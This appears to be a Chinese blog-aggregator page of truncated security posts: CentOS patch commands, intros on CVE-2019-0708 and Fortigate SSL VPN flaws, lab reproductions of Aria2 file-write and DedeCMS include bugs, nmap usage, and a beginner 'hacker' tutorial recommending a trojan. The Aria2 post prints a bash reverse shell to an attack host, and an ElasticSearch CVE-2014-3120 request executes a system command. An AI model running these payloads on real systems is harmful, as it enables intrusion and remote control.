漏洞

centos常用漏洞升级修复命令

一曲冷凌霜 提交于 2019-11-27 10:08:45
yum update kernel yum update kernel-devel yum update kernel-firmware yum update kernel-headers yum update nss-util yum update nss yum update nss-sysinit yum update nss-tools yum update vim-minimal yum update openssh yum update openssh-clients yum update openssh-server yum update python yum update python-libs升级系统内核:yum -y upgrade 升级所有包,改变软件设置和系统设置,系统版本内核都升级:yum -y update升级所有包,不改变软件设置和系统设置,系统版本升级,内核不改变:yum -y upgrade 来源: https://www.cnblogs.com/zuikeol/p/11358115.html

我们一起分析一下这个刚刚修复的RDP漏洞CVE-2019-0708

点点圈 提交于 2019-11-27 09:27:06
写在前面的话 在微软今年五月份的漏洞更新安全公告中,提到了一个跟远程桌面协议(RDP)有关的漏洞。我们之所以要在这里专门针对这个漏洞进行分析,是因为这个漏洞更新涉及到Windows XP以及其他多个Windows操作系统,而众所周知,Windows XP已经很多年没有过更新了。那么为什么微软这一次要修复这个高危漏洞呢?别着急,我们现在一起来看一看! 根据微软发布的安全公告,这是一个非常严证的安全漏洞,它将导致攻击者在目标设备上实现远程代码执行,并植入蠕虫等恶意软件。这也就意味着,一旦目标组织的其中一台设备受到了感染,整个网络系统内其他未受安全保护的计算机设备也将“无一幸免”。在这份安全公告中,微软提到了著名的网络蠕虫“WannaCry”。在2017年三月份,微软修复了针对该恶意软件的相关漏洞(MS17-010),但是在此之前,很多攻击者都在使用“WannaCry”进行网络攻击。 鉴于该漏洞的安全威胁等级(高危漏洞),攻击者很有可能会在这段时间内开发出相应的漏洞利用工具,McAfee高级威胁研究团队也对该漏洞以及相关的威胁场景进行了深度分析,我们建议广大用户尽快修复漏洞CVE-2019-0708。 受影响的操作系统 Windows 2003 Windows XP Windows 7 Windows Server 2008 Windows Server 2008 R2 RDP协议

Aria2任意文件写入漏洞

。_饼干妹妹 提交于 2019-11-27 08:14:00
目录: 简介 漏洞描述 payload 漏洞复现 一、Aria2介绍   Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过 --enable-rpc 参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 二、漏洞描述   通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸如 save-session 等也能轻易地实现任意文件写入指定功能。 三、payload   shell脚本: #! /bin/bash /bin/bash -i >& /dev/tcp/192.168.183.129/12345 0>&1   站点;http://binux.github.io/yaaw/demo/# 四、复现    靶机ip:192.168.183.134:6800   攻击机:192.168.183.129   直接访问aria2如下:     1.rpc通信需要json或xml,直接从网页操作不方便,我们使用第三方UI与目标进行通信,打开 http://binux.github.io/yaaw/demo/# 点击configuration,设置json-rpc路径(原理具体解释参照:

绿盟扫出来个http host 漏洞

て烟熏妆下的殇ゞ 提交于 2019-11-27 08:13:00
这个漏洞搞了大半天,想过从后台拦截,也想过从前台拦截,都是无从下手!网上也找了很多资料,有点乱,后来自己结合网上的办法,搞出如下解决办法:在tomcat server.xml里配置host 因为外网是在通过nginx 代理的,所以我们需要在nginx中配 server_name ****.*****.cn,**.**.**.234; 这里对应xml里配置 的host地址 之前是通配符$host 注意,配置以后,127、localhost 均不能访问!但是这样问题解决了!有不同意见的请大神不吝赐教 来源: https://www.cnblogs.com/MSNS-MTT/p/11353699.html

Fortigate SSLVPN漏洞分析和利用

蹲街弑〆低调 提交于 2019-11-27 08:11:48
0x00 前言 该事情发生于去年8月,当时我们开始了一个新的SSL VPN研究项目。与ipsec和pptp等站点到站点VPN相比,ssl vpn更易于使用,并且可与任何网络环境兼容。为了方便起见,ssl vpn成为企业最流行的远程访问方式! 但是,如果这个可信的设备是不安全的呢?它是一项公司的重要资产,但却是公司的盲点。根据我们对财富500强的调查,排名前三的SSL VPN供应商占据了大约75%的市场份额。ssl-vpn的多样性很小。因此,一旦我们发现领先的ssl-vpn存在严重漏洞,其影响将是巨大的。没有办法降低损失,因为SSL VPN必须暴露在互联网上。 在我们的研究开始时,我们对领先的SSL VPN供应商的CVE数量进行了一些调查: 看起来Fortinet和Pulse Secure的VPN是最安全的。是真的吗?作为一个打破记录的破坏者,我们接受了这一挑战,并开始攻击Fortinet和Pulse Secure!这个故事是关于黑客攻击Fortigate SSL VPN。 0x01 漏洞影响 FortiOS 5.6.3 to 5.6.7 FortiOS 6.0.0 to 6.0.4 ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled. 0x02 Fortigate SSL VPN

简易黑客初级教程:黑客技术,分享教学

三世轮回 提交于 2019-11-27 07:55:52
第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。 1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。 2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。 3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!) 4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊

DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)

寵の児 提交于 2019-11-27 07:41:53
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一、漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。 二、漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三、漏洞环境搭建 1、下载DeDeCMS V5.7 SP1,然后放到phpstudy环境下的www目录下,然后浏览器访http://192.168.10.171/dedecms/uploads/install/index.php    2、点击我已阅读并继续。然后是环境检测,保存默认即可    3、接下来是参数配置,需要设置的只有数据库密码,把自己的密码填上去就行了    4、然后就把环境搭好了    四、漏洞复现 1、查看/install/index.php源码,发现存在变量覆盖漏洞,该代码的意思是将get,post或者cookie方式传入的值通过foreach以键值对的方式输出,例如在url中输入?str=hello,则$_k的值就是str,$_v的值就是hello,所以${$_k}就是$str, 后面的RunMagicQuotes函数在另一个文件中定义的,大致就是对参数进行过滤然后返回参数内容。       2、尝试通过变量覆盖重装网站,浏览器访问   

web第六天——漏洞分析

╄→гoц情女王★ 提交于 2019-11-27 07:38:29
常见漏洞分析工具: NMAP,AWVS,Appscan,Burpsuite,Netsparker,椰树 NMAP:主机探测、端口扫描(端口扫描之王)、服务版本扫描、主机系统指纹识别、创建扫描脚本 主机探测(存活主机):nmap 192.168.1.2 nmap 192.168.1.1/24 nmap 192.168.1.2 192.168.1.5 nmap 192.168.1.1-100 nmap -iL target.txt nmap -sL 192.168.1.1/24(看扫描的所有主机的列表) nmap 192.168.1.1/24 -exclude192.168.1.1 nmap 192.168.1.1/24 -excludefile xxx.txt 端口扫描:nmap -F -sT -v nmap.org nmap -p80,22,23 nmap.org nmap -p80-65535 nmap.org -F:扫描100个最有可能开放的端口 -v:获取扫描的信息 -p:指定要扫描的端口 -sT:采用的是TCP扫描,不写也行 TCP扫描(-sT) UDP扫描(nmap -PU 192.168.1.0/24) SYN扫描(-sS) 服务版本探测: nmap -sV 192.168.1.1 精确确认端口上运行的服务 nmap -sV --script unusual-port

ElasticSearch 命令执行漏洞(CVE-2014-3120)

旧时模样 提交于 2019-11-27 07:05:06
POST /_search?pretty HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 343 { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } 该漏洞需要es中至少存在一条数据,若没有,需要先创建一条数据 POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept

如何攻击Fortigate SSL VPN

折月煮酒 提交于 2019-11-27 05:39:56
故事开始于去年8月,当时我们正式开启了一个关于SSL VPN的研究项目。与IPSEC VPN和PPTP VPN相比,SSL VPN更易于使用,并且与任何网络环境兼容。现如今,SSL VPN也成为全球各大企业最主要的远程访问技术! 但是,如果SSL VPN设备不安全怎么办?它既是企业的重要资产,也是企业的安全盲点。根据我们对财富500强企业的调查,排名前3位的SSL VPN厂商占据了约75%的市场份额。SSL VPN可以说是一个赢者通吃的市场。因此,一旦我们发现某款知名SSL VPN产品上的一个致命漏洞,影响将是巨大的。特别是考虑到,SSL VPN天生就必须暴露在互联网上。 在研究开始时,我们对全球知名的SSL VPN厂商的CVE数量做了一个小调查: 我发现Fortinet和Pulse Secure似乎是最安全的,真的吗?很快,我们对着两个企业的产品发起了挑战!这篇文章主要关于Fortigate SSL VPN,下一篇文章将谈到Pulse Secure,欢迎持续关注! Fortigate SSL VPN Fortinet将他们的SSL VPN产品线称为Fortigate SSL VPN,广泛部署于大中型企业。目前在互联网上有超过48万台Fortigate设备,在亚洲和欧洲很常见。我们可以通过URL特征 /remote/login 来进行识别,其技术特点如下: 1.一体化的二进制文件